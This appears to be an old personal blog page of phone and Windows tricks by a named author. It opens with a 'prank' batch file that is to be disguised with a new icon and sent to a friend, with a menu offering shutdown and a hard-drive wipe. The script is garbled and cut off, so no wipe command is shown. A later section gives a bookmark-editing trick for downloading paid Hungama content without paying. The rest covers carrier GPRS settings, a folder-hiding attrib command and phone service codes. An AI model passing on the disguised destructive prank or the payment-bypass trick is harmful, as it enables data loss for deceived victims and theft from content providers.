10>Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action:1: Shutdown2: Restart3: Wipes out your hard drive (BEWARE)4: Net send5: Messages then shutdownType :@echo offtitle The end of the worldcd C:\:menuclsecho I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...pauseecho Pick your poison:echo १ । Die this way (Wimp)echo 2। Die this way (WIMP!)echo 3। DO NOT DIE THIS WAYecho 4। Die this way (you're boring)echo 5। Easy way outset input=nothingset /p input=Choice:if %input%==१
goto oneif %input%==2 goto twoSave it as "Anything.BAT" and send it.
You might wanna have to change the Icon of the file before sending it to your friend, so right click the file, click Properties, click on the 'Change' Icon and change the icon from there. Plese contact------------------------------------------------gvnd.soni20@gmail.com---------------------------------------------

FREE DOWNLOAD FROM HUNGAMA USING AIRTEL LIVE -by Govind Soni

YES you can download every thing for free from wap.hungama.com using Airtel LIVE . at first YOU NEEDS a new airtel sim. MAKE the ballane bellow then .50 paisa.then dial -*567*1# and then activate MO(3O paisa/50 kb).now go to wap.hungama.com with your phone browser. then select any content as you wish to downlnad.now it will opens a page saying- "Authorization failed please contact you service provider" or else.don't be afraid it is a sign of our success. then bookmark this error page and come out.now go to Bookmark.heare you can see a bookmark titled-"Sorry!".edit this bookmark and replace 'content_download' to 'f_download'. now go to this bookmark and download the content that you chosen priviouslly.enjoy.(Aisee AZADI AUR KAHAN?)Piease replay me if u success.i will happy to help you.please E-Mail for any query or question or abuse.-RegardsGOVIND SONI----------gvnd.soni20@gmail.com----------

Manual GPRS Settings for HUTCH,Airtel Live,Mobile office,Id!a & BSNL

---------------------------------------------------------Manual Airtel live settings-Account Name - Airtel_live Homepage - http://live.airtelworld.com Username - Blank Password - Blank Proxy - Enabled/yes Proxy and Server Adress - 100.1.200.99 Accespoint Name - airtelfun.com Proxy and Server Port - 8080 Data bearer - GPRS/ Packet Data Authentication Type - Normal---------------------------------------------------- Manual Idea Gprs Settings -Account Name - idea_GPRS Username - Blank Password - Blank Homepage - http://wap.ideafresh.com Proxy and Server Port - 8080 Proxy and Server adress - 10.4.42.45 Databearer - GPRS / Packetdata Acces Point Name - imis Proxy - Enabled/yes Authentication Type - Normal -------------------------------------------------Manual Bsnl Gprs Settings -Account Name - BPL WAP Username - Password - Proxy - Enabled/yes Homepage - http://wap.mizone.bplmobile.com Proxy and Server address - 10.0.0.10 Proxy and Server Port - 8080 Acces Point Name - mizone Data bearer - GPRS/ Packetdata Authentication Type - Normal -------------------------------------------------------__________________________________________________________________gvnd.soni20@gmail.com__________________________________________________________________JOIN ME on smsgupshup.com just write-JOIN SIKAR_SMSand send it to 567678___________________________________________________________________-Regards,Govind Soni,Sikar (332001)INDIA____________________________________________________________________

Lock a folder in windows XP without any software

To Lock a folder in windows XP without any software
follow the steps below-
Make a folder in C Drive,rename it as 'abc' without quotes
now open command prompt from start menu. Type-
"attrib +s +h C:\www.sikar.tk"
with quotes and press enter. This command will Make your folder invisible and
it can not be seen even in hidden files and folders. To make visible again type -
"attrib -s -h C:\www.sikar.tk"
You can lock any folder also by changing the location C:\www.sikar.tk
to address of your folder

__________________________________________________________________
gvnd.soni20@gmail.com
__________________________________________________________________
JOIN ME on smsgupshup.com just write-

JOIN SIKAR_SMS

and send it to 567678
___________________________________________________________________
-Regards,
Govind Soni,
Sikar (332001)
INDIA
____________________________________________________________________
SECRET CODES FOR CHINA MOBILE
Engineering Mode: *#110*01#

factory Mode: *#987#

Restore Factory Settings: *#987*99#

Check Software Version: *#900# OR *#800#

Default User Codes: 1122, 3344, 1234, 5678

Change LCD Contrast: *#369#

To Enable COM Port: *#110*01# -> Device -> Set UART -> PS Config -> UART1/115200

Codes to Change Screen Language:

* *#0000# + Send : Set Default Language
* *#0007# + Send : Set Language to Russian
* *#0033# + Send : Set Language to French
* *#0034# + Send : Set Language to Spanish
* *#0039# + Send : Set Language to Italian
* *#0044# + Send : Set Language to English
* *#0049# + Send : Set Language to German
* *#0066# + Send : Set Language to Thai
* *#0084# + Send : Set Language to Vietnamese
* *#0966# + Send : Set Language to Arabic






Please contact-
-----------------------------------------------
gvnd.soni20@gmail.com
---------------------------------------------
JOIN SIKAR_SMS

send it to 567678
----------------------------------------
-Govind Soni
Sikar(RAJ.)
+919783390179
-----------------------------------------------

Search

INFOLINK

Related Posts Plugin for WordPress, Blogger...